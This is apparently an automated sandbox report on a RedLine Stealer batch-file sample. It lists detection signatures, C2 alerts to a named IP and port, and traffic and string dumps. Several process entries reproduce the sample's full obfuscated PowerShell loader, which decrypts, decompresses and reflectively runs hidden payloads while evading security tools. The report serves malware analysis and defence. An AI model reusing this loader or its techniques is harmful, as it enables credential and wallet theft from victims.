Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z52PO0048857.cmd

Overview

General Information

Sample name:z52PO0048857.cmd
Analysis ID:1535306
MD5:832dd29f7ffd54f656233e56c588b4fd
SHA1:fd306aaaa8b2065f80773cf440e245f3120eef09
SHA256:3868b32b9aeabdd021b9f5d029a741304def18fa3c19a0fe4872e82939aac02d
Tags:cmduser-Porcupine
Infos:

Detection

RedLine
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • cmd.exe (PID: 2288 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z52PO0048857.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3272 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\z52PO0048857.cmd';$BczT='GeRVWptRVWpCRVWpurRVWpreRVWpntRVWpPRVWproRVWpcRVWpessRVWp'.Replace('RVWp', ''),'SpdpWdlitdpWd'.Replace('dpWd', ''),'EntUUZwrUUZwyPUUZwoUUZwinUUZwtUUZw'.Replace('UUZw', ''),'ElmNutemNutmmNutentmNutAtmNut'.Replace('mNut', ''),'LoZlRdadZlRd'.Replace('ZlRd', ''),'FriYMJomiYMJBiYMJasiYMJe64iYMJStiYMJriiYMJngiYMJ'.Replace('iYMJ', ''),'CDTtzhaDTtznDTtzgeDTtzExDTtzteDTtznsDTtzioDTtznDTtz'.Replace('DTtz', ''),'TrUPQEanUPQEsfUPQEormUPQEFUPQEiUPQEnUPQEalUPQEBUPQElocUPQEkUPQE'.Replace('UPQE', ''),'IqNQJnvqNQJoqNQJkeqNQJ'.Replace('qNQJ', ''),'CoqEENpqEENyqEENToqEEN'.Replace('qEEN', ''),'CrehWBeaehWBteehWBDehWBeehWBcehWBrypehWBtorehWB'.Replace('ehWB', ''),'MaQHwVinQHwVModQHwVuQHwVleQHwV'.Replace('QHwV', ''),'ReoviQadLoviQinoviQeoviQsoviQ'.Replace('oviQ', ''),'Devonzcomvonzpvonzrevonzssvonz'.Replace('vonz', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BczT[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function pWQul($PgjTo){$ArRhZ=[System.Security.Cryptography.Aes]::Create();$ArRhZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ArRhZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ArRhZ.Key=[System.Convert]::($BczT[5])('BCbtvIveY0T0lkWSkDxWOMe/c90s1PvXXJN390CRmts=');$ArRhZ.IV=[System.Convert]::($BczT[5])('JbfpGWq+SHjQD2Awma012A==');$BcXUN=$ArRhZ.($BczT[10])();$RcqyN=$BcXUN.($BczT[7])($PgjTo,0,$PgjTo.Length);$BcXUN.Dispose();$ArRhZ.Dispose();$RcqyN;}function iDUTr($PgjTo){$bKrDu=New-Object System.IO.MemoryStream(,$PgjTo);$gnvgt=New-Object System.IO.MemoryStream;$atXgD=New-Object System.IO.Compression.GZipStream($bKrDu,[IO.Compression.CompressionMode]::($BczT[13]));$atXgD.($BczT[9])($gnvgt);$atXgD.Dispose();$bKrDu.Dispose();$gnvgt.Dispose();$gnvgt.ToArray();}$XZgdm=[System.IO.File]::($BczT[12])([Console]::Title);$IbVAd=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 5).Substring(2))));$AAuWz=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 6).Substring(2))));[System.Reflection.Assembly]::($BczT[4])([byte[]]$AAuWz).($BczT[2]).($BczT[8])($null,$null);[System.Reflection.Assembly]::($BczT[4])([byte[]]$IbVAd).($BczT[2]).($BczT[8])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 2768 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • powershell.exe (PID: 4080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z52PO0048857.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2288, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2768, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-16T20:39:14.416665+020020450001Malware Command and Control Activity Detected51.195.145.7757942192.168.2.849704TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-16T20:38:59.822671+020020460561A Network Trojan was detected51.195.145.7757942192.168.2.849705TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-16T20:38:59.822671+020020450011Malware Command and Control Activity Detected51.195.145.7757942192.168.2.849705TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-16T20:39:09.385121+020028496621Malware Command and Control Activity Detected192.168.2.84970451.195.145.7757942TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-16T20:39:15.250494+020028493511Malware Command and Control Activity Detected192.168.2.84970551.195.145.7757942TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-16T20:39:19.145390+020028493521Malware Command and Control Activity Detected192.168.2.84970751.195.145.7757942TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.8:49705 -> 51.195.145.77:57942
      Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.8:49704 -> 51.195.145.77:57942
      Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 51.195.145.77:57942 -> 192.168.2.8:49704
      Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.8:49707 -> 51.195.145.77:57942
      Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 51.195.145.77:57942 -> 192.168.2.8:49705
      Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 51.195.145.77:57942 -> 192.168.2.8:49705
      Source: global trafficTCP traffic: 51.195.145.77 ports 57942,2,4,5,7,9
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 57942
      Source: unknownNetwork traffic detected: HTTP traffic on port 57942 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 57942
      Source: unknownNetwork traffic detected: HTTP traffic on port 57942 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 57942
      Source: unknownNetwork traffic detected: HTTP traffic on port 57942 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 57942
      Source: unknownNetwork traffic detected: HTTP traffic on port 57942 -> 49707
      Source: global trafficTCP traffic: 192.168.2.8:49704 -> 51.195.145.77:57942
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 51.195.145.77:57942Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 51.195.145.77:57942Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 51.195.145.77:57942Content-Length: 959963Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 51.195.145.77:57942Content-Length: 959955Expect: 100-continueAccept-Encoding: gzip, deflate
      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.145.77
      Source: global trafficDNS traffic detected: DNS query: api.ip.sb
      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 51.195.145.77:57942Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
      Source: powershell.exe, 00000005.00000002.1448410913.00000000077CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: powershell.exe, 00000005.00000002.1445238637.00000000051D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: powershell.exe, 00000005.00000002.1445238637.00000000051D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1445238637.00000000051F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
      Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drString found in binary or memory: https://www.ecosia.org/newtab/
      Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2298
      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2298Jump to behavior
      Source: classification engineClassification label: mal96.troj.spyw.evad.winCMD@8/51@1/1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2352:120:WilError_03
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4czvfbzv.1zw.ps1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: tmpE9FF.tmp.3.dr, tmpEA30.tmp.3.dr, tmpEB88.tmp.3.dr, tmpEB89.tmp.3.dr, tmpEA20.tmp.3.dr, tmpEB77.tmp.3.dr, tmpEA0F.tmp.3.dr, tmpEB9A.tmp.3.dr, tmpEB99.tmp.3.dr, tmpE9EE.tmp.3.dr, tmpEBAB.tmp.3.dr, tmpEA41.tmp.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: powershell.exeString found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z52PO0048857.cmd" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\z52PO0048857.cmd';$BczT='GeRVWptRVWpCRVWpurRVWpreRVWpntRVWpPRVWproRVWpcRVWpessRVWp'.Replace('RVWp', ''),'SpdpWdlitdpWd'.Replace('dpWd', ''),'EntUUZwrUUZwyPUUZwoUUZwinUUZwtUUZw'.Replace('UUZw', ''),'ElmNutemNutmmNutentmNutAtmNut'.Replace('mNut', ''),'LoZlRdadZlRd'.Replace('ZlRd', ''),'FriYMJomiYMJBiYMJasiYMJe64iYMJStiYMJriiYMJngiYMJ'.Replace('iYMJ', ''),'CDTtzhaDTtznDTtzgeDTtzExDTtzteDTtznsDTtzioDTtznDTtz'.Replace('DTtz', ''),'TrUPQEanUPQEsfUPQEormUPQEFUPQEiUPQEnUPQEalUPQEBUPQElocUPQEkUPQE'.Replace('UPQE', ''),'IqNQJnvqNQJoqNQJkeqNQJ'.Replace('qNQJ', ''),'CoqEENpqEENyqEENToqEEN'.Replace('qEEN', ''),'CrehWBeaehWBteehWBDehWBeehWBcehWBrypehWBtorehWB'.Replace('ehWB', ''),'MaQHwVinQHwVModQHwVuQHwVleQHwV'.Replace('QHwV', ''),'ReoviQadLoviQinoviQeoviQsoviQ'.Replace('oviQ', ''),'Devonzcomvonzpvonzrevonzssvonz'.Replace('vonz', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BczT[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function pWQul($PgjTo){$ArRhZ=[System.Security.Cryptography.Aes]::Create();$ArRhZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ArRhZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ArRhZ.Key=[System.Convert]::($BczT[5])('BCbtvIveY0T0lkWSkDxWOMe/c90s1PvXXJN390CRmts=');$ArRhZ.IV=[System.Convert]::($BczT[5])('JbfpGWq+SHjQD2Awma012A==');$BcXUN=$ArRhZ.($BczT[10])();$RcqyN=$BcXUN.($BczT[7])($PgjTo,0,$PgjTo.Length);$BcXUN.Dispose();$ArRhZ.Dispose();$RcqyN;}function iDUTr($PgjTo){$bKrDu=New-Object System.IO.MemoryStream(,$PgjTo);$gnvgt=New-Object System.IO.MemoryStream;$atXgD=New-Object System.IO.Compression.GZipStream($bKrDu,[IO.Compression.CompressionMode]::($BczT[13]));$atXgD.($BczT[9])($gnvgt);$atXgD.Dispose();$bKrDu.Dispose();$gnvgt.Dispose();$gnvgt.ToArray();}$XZgdm=[System.IO.File]::($BczT[12])([Console]::Title);$IbVAd=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 5).Substring(2))));$AAuWz=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 6).Substring(2))));[System.Reflection.Assembly]::($BczT[4])([byte[]]$AAuWz).($BczT[2]).($BczT[8])($null,$null);[System.Reflection.Assembly]::($BczT[4])([byte[]]$IbVAd).($BczT[2]).($BczT[8])($null,$null); "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\z52PO0048857.cmd';$BczT='GeRVWptRVWpCRVWpurRVWpreRVWpntRVWpPRVWproRVWpcRVWpessRVWp'.Replace('RVWp', ''),'SpdpWdlitdpWd'.Replace('dpWd', ''),'EntUUZwrUUZwyPUUZwoUUZwinUUZwtUUZw'.Replace('UUZw', ''),'ElmNutemNutmmNutentmNutAtmNut'.Replace('mNut', ''),'LoZlRdadZlRd'.Replace('ZlRd', ''),'FriYMJomiYMJBiYMJasiYMJe64iYMJStiYMJriiYMJngiYMJ'.Replace('iYMJ', ''),'CDTtzhaDTtznDTtzgeDTtzExDTtzteDTtznsDTtzioDTtznDTtz'.Replace('DTtz', ''),'TrUPQEanUPQEsfUPQEormUPQEFUPQEiUPQEnUPQEalUPQEBUPQElocUPQEkUPQE'.Replace('UPQE', ''),'IqNQJnvqNQJoqNQJkeqNQJ'.Replace('qNQJ', ''),'CoqEENpqEENyqEENToqEEN'.Replace('qEEN', ''),'CrehWBeaehWBteehWBDehWBeehWBcehWBrypehWBtorehWB'.Replace('ehWB', ''),'MaQHwVinQHwVModQHwVuQHwVleQHwV'.Replace('QHwV', ''),'ReoviQadLoviQinoviQeoviQsoviQ'.Replace('oviQ', ''),'Devonzcomvonzpvonzrevonzssvonz'.Replace('vonz', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BczT[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function pWQul($PgjTo){$ArRhZ=[System.Security.Cryptography.Aes]::Create();$ArRhZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ArRhZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ArRhZ.Key=[System.Convert]::($BczT[5])('BCbtvIveY0T0lkWSkDxWOMe/c90s1PvXXJN390CRmts=');$ArRhZ.IV=[System.Convert]::($BczT[5])('JbfpGWq+SHjQD2Awma012A==');$BcXUN=$ArRhZ.($BczT[10])();$RcqyN=$BcXUN.($BczT[7])($PgjTo,0,$PgjTo.Length);$BcXUN.Dispose();$ArRhZ.Dispose();$RcqyN;}function iDUTr($PgjTo){$bKrDu=New-Object System.IO.MemoryStream(,$PgjTo);$gnvgt=New-Object System.IO.MemoryStream;$atXgD=New-Object System.IO.Compression.GZipStream($bKrDu,[IO.Compression.CompressionMode]::($BczT[13]));$atXgD.($BczT[9])($gnvgt);$atXgD.Dispose();$bKrDu.Dispose();$gnvgt.Dispose();$gnvgt.ToArray();}$XZgdm=[System.IO.File]::($BczT[12])([Console]::Title);$IbVAd=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 5).Substring(2))));$AAuWz=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 6).Substring(2))));[System.Reflection.Assembly]::($BczT[4])([byte[]]$AAuWz).($BczT[2]).($BczT[8])($null,$null);[System.Reflection.Assembly]::($BczT[4])([byte[]]$IbVAd).($BczT[2]).($BczT[8])($null,$null); "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
